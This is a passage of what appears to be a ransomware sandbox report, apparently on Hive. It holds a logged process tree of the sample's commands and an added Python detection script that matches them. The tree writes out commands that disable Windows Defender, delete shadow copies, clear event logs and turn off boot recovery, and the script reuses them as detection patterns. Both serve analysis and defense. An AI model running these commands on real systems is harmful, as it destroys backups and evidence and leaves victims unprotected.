    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 744)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 1816)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  C:\Windows\system32\reg.exe (PID 1504)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    signatures: Modifies security service
  C:\Windows\system32\reg.exe (PID 1872)
    cmdline: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

  C:\Windows\system32\vssadmin.exe (PID 540)
    cmdline: vssadmin.exe delete shadows /all /quiet
    signatures: Interacts with shadow copies

  C:\Windows\system32\wevtutil.exe (PID 1760)
    cmdline: wevtutil.exe cl system
    signatures: Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe (PID 1060)
    cmdline: wevtutil.exe cl security
    signatures: Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe (PID 1928)
    cmdline: wevtutil.exe cl application
    signatures: Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\Wbem\wmic.exe (PID 1748)
    cmdline: wmic.exe SHADOWCOPY /nointeractive
    signatures: Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\Wbem\wmic.exe (PID 812)
    cmdline: wmic.exe shadowcopy delete
    signatures: Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\bcdedit.exe (PID 1920)
    cmdline: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    signatures: Modifies boot configuration data using bcdedit
  C:\Windows\system32\bcdedit.exe (PID 620)
    cmdline: bcdedit.exe /set {default} recoveryenabled no
    signatures: Modifies boot configuration data using bcdedit

  C:\Windows\system32\cmd.exe (PID 468)
    cmdline: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    C:\Program Files\Windows Defender\MpCmdRun.exe (PID 1272)
      cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      signatures: Deletes Windows Defender Definitions

  C:\Windows\system32\cmd.exe (PID 1796)
    cmdline: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1868)
      cmdline: powershell Set-MpPreference -DisableIOAVProtection $true
      signatures: Suspicious behavior: EnumeratesProcesses

  C:\Windows\system32\cmd.exe (PID 2116)
    cmdline: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2136)
      cmdline: powershell Set-MpPreference -DisableRealtimeMonitoring $true
      signatures: Suspicious behavior: EnumeratesProcesses

  C:\Windows\system32\notepad.exe (PID 2532)
    cmdline: notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt
    signatures: Opens file in notepad (likely ransom note)

  C:\Windows\system32\cmd.exe (PID 2540)
    cmdline: cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
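The process tree above is the whole recovery-inhibition and defence-evasion script in one place: stop and disable the backup and VSS services, tamper with the Defender policy and service keys, strip definitions, clear the three main event logs, delete shadow copies two ways, turn off boot recovery, and finally self-delete. What follows is an added example of turning that into a detection over process-creation telemetry; it is the editor's code, not part of the sandbox output or of Hive. It assumes records with pid, ppid, image and cmdline fields (what Sysmon Event ID 1 or Security 4688 provide), credits hits in MpCmdRun, powershell and net1 children to the process that spawned the cmd.exe or net.exe wrapper, and scores on distinct techniques per actor rather than on raw hit count. It matches the attempted command line, not its effect: the run is on Windows 7, where SecurityHealthService and the ExploitGuard task do not exist and those commands fail, yet they are still the signal. The events are a constructed subset of the tree; the PIDs this run reuses (760, 1060, 1504, 1596 each appear twice) are left out, which is the reminder that a production pipeline keys on process GUIDs rather than PIDs. The ATT&CK technique IDs are the editor's mapping, not the report's.

```python
"""Detection over process-creation telemetry for the recovery-inhibition and
defence-evasion chain in the process tree above.

Added example for this report, not part of the sandbox output. Input records
are assumed to carry pid, ppid, image and cmdline. Matching is on the attempted
command line, not on whether it succeeded. ATT&CK IDs are the editor's mapping.
"""
import re
from collections import defaultdict

# (rule name, ATT&CK technique, pattern over the command line)
RULES = [
    ("shadow_copy_delete", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("bcd_recovery_off", "T1490",
     re.compile(r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("backup_service_stop", "T1489",
     re.compile(r"\bnet1?(\.exe)?\s+stop\s+\"?(VSS|wbengine|SDRSVC)\"?", re.I)),
    ("backup_service_disabled", "T1489",
     re.compile(r"\bsc(\.exe)?\s+config\s+\"?(VSS|wbengine|SDRSVC)\"?\s+start=\s*disabled", re.I)),
    ("defender_policy_tamper", "T1562.001",
     re.compile(r"\breg(\.exe)?\s+add\s+\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender", re.I)),
    ("defender_service_disabled", "T1562.001",
     re.compile(r"\breg(\.exe)?\s+add\s+\"HKLM\\System\\CurrentControlSet\\Services\\"
                r"(WinDefend|WdFilter|WdBoot|WdNisSvc|WdNisDrv|SecurityHealthService)\""
                r"\s+/v\s+\"Start\"\s+/t\s+REG_DWORD\s+/d\s+\"4\"", re.I)),
    ("defender_definitions_removed", "T1562.001",
     re.compile(r"MpCmdRun(\.exe)?\"?\s+-RemoveDefinitions", re.I)),
    ("defender_mppreference", "T1562.001",
     re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$true", re.I)),
    ("defender_tasks_disabled", "T1562.001",
     re.compile(r"\bschtasks(\.exe)?\s+/Change\s+/TN\s+\"Microsoft\\Windows\\Windows Defender\\", re.I)),
    ("event_log_cleared", "T1070.001",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\s+(system|security|application)\b", re.I)),
    ("self_delete", "T1070.004",
     re.compile(r"\bping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&&\s*del\s+", re.I)),
]

# LOLBins that only relay the command to a child (cmd.exe -> MpCmdRun/powershell,
# net.exe -> net1.exe). Hits in the child are credited to whoever spawned the wrapper.
WRAPPERS = {"cmd.exe", "net.exe"}


def image_name(image):
    return image.rsplit("\\", 1)[-1].lower()


def actor_of(pid, by_pid):
    """Climb past wrapper processes to the pid that really drove the action."""
    ev = by_pid[pid]
    while ev["ppid"] in by_pid and image_name(by_pid[ev["ppid"]]["image"]) in WRAPPERS:
        ev = by_pid[ev["ppid"]]
    return ev["ppid"]


def detect(events, threshold=3):
    """Return {actor pid: summary} for every process whose direct or wrapped
    children hit at least `threshold` distinct rules."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(lambda: {"rules": set(), "techniques": set(), "evidence": []})
    for e in events:
        for name, technique, rx in RULES:
            if rx.search(e["cmdline"]):
                h = hits[actor_of(e["pid"], by_pid)]
                h["rules"].add(name)
                h["techniques"].add(technique)
                h["evidence"].append((e["pid"], name, e["cmdline"]))
    alerts = {}
    for actor, h in hits.items():
        if len(h["rules"]) >= threshold:
            alerts[actor] = {
                "image": by_pid[actor]["image"] if actor in by_pid else "<not in log>",
                "rules": sorted(h["rules"]),
                "techniques": sorted(h["techniques"]),
                "evidence_count": len(h["evidence"]),
            }
    return alerts


# Constructed input: a subset of the tree above (reused PIDs omitted) plus a
# benign admin clearing one log from an interactive shell, which must not alert.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
EVENTS = [
    {"pid": 844, "ppid": 1, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 1568, "ppid": 844, "image": r"C:\Windows\system32\net.exe", "cmdline": 'net.exe stop "wbengine" /y'},
    {"pid": 952, "ppid": 1568, "image": r"C:\Windows\system32\net1.exe", "cmdline": r'C:\Windows\system32\net1 stop "wbengine" /y'},
    {"pid": 2028, "ppid": 844, "image": r"C:\Windows\system32\sc.exe", "cmdline": 'sc.exe config "VSS" start= disabled'},
    {"pid": 1036, "ppid": 844, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'},
    {"pid": 1612, "ppid": 844, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f'},
    {"pid": 1824, "ppid": 844, "image": r"C:\Windows\system32\schtasks.exe",
     "cmdline": r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'},
    {"pid": 540, "ppid": 844, "image": r"C:\Windows\system32\vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"pid": 1760, "ppid": 844, "image": r"C:\Windows\system32\wevtutil.exe", "cmdline": "wevtutil.exe cl system"},
    {"pid": 812, "ppid": 844, "image": r"C:\Windows\System32\Wbem\wmic.exe", "cmdline": "wmic.exe shadowcopy delete"},
    {"pid": 620, "ppid": 844, "image": r"C:\Windows\system32\bcdedit.exe", "cmdline": "bcdedit.exe /set {default} recoveryenabled no"},
    {"pid": 468, "ppid": 844, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"pid": 1272, "ppid": 468, "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'},
    {"pid": 2116, "ppid": 844, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"pid": 2136, "ppid": 2116, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"pid": 2540, "ppid": 844, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": f'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "{SAMPLE}"'},
    {"pid": 3000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3100, "ppid": 3000, "image": r"C:\Windows\system32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 3200, "ppid": 3100, "image": r"C:\Windows\system32\wevtutil.exe", "cmdline": "wevtutil.exe cl application"},
]

if __name__ == "__main__":
    for actor, summary in detect(EVENTS).items():
        print(actor, summary)
```

With the default threshold only PID 844 alerts, with all eleven rules and five techniques credited to it even though several of the matching command lines ran inside cmd.exe or net.exe children; the lone wevtutil under explorer.exe is recorded against the interactive session but stays below the bar. Lowering the threshold to 1 turns the script into a per-technique hunt query, which is the right setting for the event-log-clearing rule on its own in most estates.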
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: b8e610b2334f1c528aa7ec5b8c07f1e4
  SHA1: 3583b173c98b14b9fc18c798cecd94fd9889fb31
  SHA256: 187b9e01b982fce924b1c7182002c48cd192205e7b2c2d86ea9c11264bee1792
  SHA512: 743f07cd92debbcbee136af8b2e6e2921e89d6ccd10884a89417448cb378777b086632c6ddab05d02920f7ca9845c86163af0eded72afc8a66bcf1fa887e8494